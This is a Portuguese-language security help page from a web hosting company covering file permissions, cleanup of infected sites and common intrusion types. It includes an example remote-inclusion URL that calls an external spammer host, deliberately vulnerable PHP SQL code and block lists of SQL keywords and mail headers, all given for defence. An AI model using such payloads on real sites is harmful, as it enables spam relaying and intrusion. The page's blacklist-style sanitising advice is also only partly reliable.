Documentação

Principais recomendações de segurança

A SAN Internet adota todos os cuidados e precauções para que seus sistemas e servidores estejam sempre atualizados e reparados, a fim de evitar quaisquer brechas de segurança nos sites hospedados em nosso ambiente compartilhado.

Entretanto, às vezes podem surgir vulnerabilidades que são alheias aos nossos servidores e podem ser exploradas por diversos meios. Alguns exemplos são:

  • Falhas na programação dos sites e sistemas hospedados.
  • Scripts inseridos fazendo uso de falhas como PHP e SQL Injection.
  • Arquivos maliciosos instalados no computador que realiza as manipulações do site.
  • Entre outros.

Devido a isto, indicamos algumas prevenções simples.

Principais recomendações de segurança:

  • Altere periodicamente a sua senha de acesso ao serviço FTP;
  • Evite usar senhas fáceis, como datas de nascimento ou sequências conhecidas. Alguns exemplos de senhas fracas e ruins são: 123456, qwerty, 123123, entre outros;
  • Mantenha seu sistema sempre atualizado. É comum que nas novas versões dos softwares usados, as falhas de segurança sejam corrigidas, assim como falhas de versões anteriores;
  • No sistema, tenha cuidado com a parte que permite que seja feito o upload para ele. A maioria das invasões ocorrem por falhas de segurança nos sistema, e o invasor consegue injetar código malicioso;
  • Procure restringir na parte de upload de arquivos, os formatos que poderão ser enviados. Por exemplo, permita apenas o upload de arquivos com extensões JPG e PNG;
  • Tenha um antivírus ativado em seu computador pessoal;
  • Instale um firewall em seu computador pessoal. Dessa forma, você irá evitar que uma falha de segurança do seu computador seja explorada, ou que um programa malicioso no seu computador se propague, contaminando outros;
  • Evite usar permissões do tipo 777 (leitura, gravação e execução para o proprietário, grupo ao qual ele pertence e todos os outros) em seus arquivos e pastas. Esta permissão deve ser evitada ao máximo, use-a nas pastas onde isso é realmente necessário;


Padrão de permissão em pastas e arquivos:

  • Arquivos com permissão 644, que significa:
  1. Permissão de leitura e gravação para o proprietário do arquivo
  2. Permissão de leitura para o grupo ao qual o proprietário do arquivo faz parte.
  3. Permissão de leitura para todos os outros usuários.                  
  • Pastas com permissão 755, que significa:         
  1. Permissão de leitura, gravação e execução para o proprietário da pasta.
  2. Permissão de leitura e execução para o grupo ao qual o proprietário da pasta faz parte.
  3. Permissão de leitura e execução para todos os outros usuários.


Os comandos abaixo executados por SSH corrigem as permissões:
Para colocar permissão 644 em todos os arquivos, use: find . -type f -exec chmod 644 '{}' \;
Para colocar permissão 755 em todos as pastas, use: find . -type d -exec chmod 755 '{}' \;  


Minha hospedagem está infectada com arquivos maliciosos, o que devo fazer?

  • Verifique se o antivírus, firewall e anti-spyware que você tem instalados no seu computador local são confiáveis e se estão atualizados.
  • Atualize suas ferramentas de segurança, e faça o download de todos os arquivos do site para este computador.
  • Execute uma passagem do antivírus em todos os arquivos do site. Caso seja identificado algum vírus, remova-o.
  • Após certificar-se de que todos os arquivos do site estão livres de arquivos maliciosos, faça o upload dos mesmos para o servidor FTP do seu domínio.
  • Caso persista a ameaça, verifique com seu webmaster se no arquivo índice do seu site (index.html, index.php, etc) há algum iframe que executa o vírus a partir de outro local, pois esta será a razão do incidente.
  • Após todos estes passos, registre ticket em sua área de cliente solicitando que nossa equipe técnica vai analisar.
  • Lembramos que a integridade dos arquivos e programas descarregados ou enviados pelo seu site, bem como os danos que estes podem causar a terceiros, é de responsabilidade do proprietário do site. Sendo assim, a SAN Internet está isenta de qualquer problema decorrente da contaminação causada por estes arquivos/programas.


Site identificado como perigoso pelo Google, o que devo fazer?

Siga os mesmos procedimentos do tópico acima e depois os passos abaixo:

  • Cadastre seu site na ferramenta de webmasters que é disponibilizada pelo Google.
  • Faça os procedimentos que o Google solicita. Desta forma, eles apontarão quais são os arquivos considerados "maliciosos" dentro do seu site.
  • Verifique os arquivos mencionados e faça a limpeza, usando um cliente FTP.
  • Em seguida, solicite uma reconsideração do seu site através do próprio Google Webmaster.


Tipos de invasão:

SQL Injection:
SQL Injection é um ataque que consiste na inserção (conhecido como injeção) de uma query via aplicação web. No "SQL Injection", o invasor consegue através de brechas no site executar queries ou statements arbitrários numa base relacional via "injeção" de comandos em campos de formulários. Para se proteger de ocorrências de SQL Injection, verifique se todo parâmetro passado para o seu site é tratado antes que seja concatenado na query. Por exemplo, é muito comum erros como os que estão aí embaixo serem cometidos:
$consulta = "DELETE FROM tabela WHERE id_tabela = " . $_POST[id];  
Evite cometê-los. Em vez disso, trate primeiro o Request.Form("id") ou $_POST[id], como neste exemplo:
if (is_numeric($_POST[id])) {
     $consulta = "DELETE FROM tabela WHERE id_tabela = " . $_POST[id];
} else {
     die("Dados inválidos");
}  

Para campos com strings, é aconselhável checar pelos caracteres:
" (aspas duplas)
' (aspas simples)
  (espaços)  
; (ponto e vírgula)
= (sinal de igual)
< (sinal de menor que)
> (sinal de maior que)  
! (ponto de exclamação)   
-- (dois hifens, indica início de comentário em alguns bancos)
# (sustenido ou jogo-da-velha, indica início de comentário em alguns bancos)
// (duas barras, indica início de comentário em alguns bancos)

Ou pelas palavras reservadas: SELECT, INSERT, UPDATE, DELETE, WHERE, JOIN, LEFT, INNER, NOT, IN, LIKE, TRUNCATE, DROP, CREATE, ALTER, DELIMITER


Script Injection
Explorando scripts que permitem a inserção de parâmetros na URL, o invasor pode, por exemplo, executar um script externo para envio de spam usando seu website. Neste caso, a URL ficaria com um formato similar a:
http://www.sitevulnerável.com.br/index.php?page=
http://sitedospammer.ru:q1w2e3r4@ftp.repositóriodearquivos.ru/lista.TXT
Nossa sugestão, neste caso, é que os scripts afetados filtrem a ocorrência de padrões como: "http://" nos parâmetros da URL, impedindo a chamada de scripts externos.


Mail Form Injection
A partir de formulários de contato do site, o invasor insere comandos SMTP nos campos (ou variáveis) que permitem enviar mensagens de spam. Nossa sugestão, neste caso, é que os scripts afetados filtrem a ocorrência de padrões como: "CC:", "Cc:", "cc:", "BCC:", "Bcc:" e "bcc:", impedindo seu uso para envio de spams.


Upload de Códigos Maliciosos
Esse é o tipo mais comum de invasão hoje em dia. Usando formulários de upload sem autenticação de acesso, ou a partir de uma invasão de áreas vulneráveis do site, o spammer faz o upload de scripts maliciosos para alteração de arquivos, alteração do banco de dados ou envio de spam. Nossa sugestão, neste caso, é manter o acesso a áreas de upload de arquivos protegido por senha. Além disso, é necessário manter softwares de terceiros, como lojas on-line e CMS, sempre atualizados e com vulnerabilidades corrigidas.


Invasão via FTP
Nesta situação, a senha é obtida por terceiros a partir de programas maliciosos instalados no computador do usuário. Estes programas, captam e enviam os dados de acesso ao FTP para terceiros que, posteriormente, os utilizam para publicação de scripts para envio de spam, propagação de vírus ou hospedagem de sites falsos. Nossa sugestão, neste caso, é manter um bom software antivírus instalado e atualizado nos computadores que acessam o site via FTP. Além disso, evite acessar o site via FTP em computadores de uso comum, como os disponíveis em lanhouses e cybercafés.


Sites baseados no WordPress e Joomla são alvos de ataques de scripts jQuery falsos

A equipe de especialistas em segurança disse que um método de ataque específico que tem crescido ao longo dos últimos meses inclui o uso de um script jQuery falso introduzido na sessão de sites alimentados pelos sistemas de gerenciamento de conteúdo WordPress e Joomla, levando a uma teia de infecções. Segundo os especialistas da Avast, os scripts jQuery falsos foram encontrados em quase 70 milhões de arquivos originais em sites comprometidos. Desde novembro do ano passado, um total de 4,5 milhões de usuários encontrou sites infectados devido ao número "anormalmente elevado" de domínios comprometidos, dizem os especialistas. Uma vez introduzido, o código, em seguida, é usado para aumentar a classificação pelo Search Engine Optimization (SEO) de outros domínios, que não só pode espalhar a infecção, aumentando o número de sites comprometidos, mas também de ataques de cibercriminosos. Atenção redobrada na hora de utilizar scripts pronto!

A SAN Internet avisa quando detecta algo irregular no site?

Sim. Nossa equipe de segurança da informação, faz uma notificação ao cliente através da sua área de cliente, informando os arquivos que foram identificados como maliciosos e solicitando seu retorno para identificarmos a natureza do arquivo encontrado.


Este artigo lhe foi útil?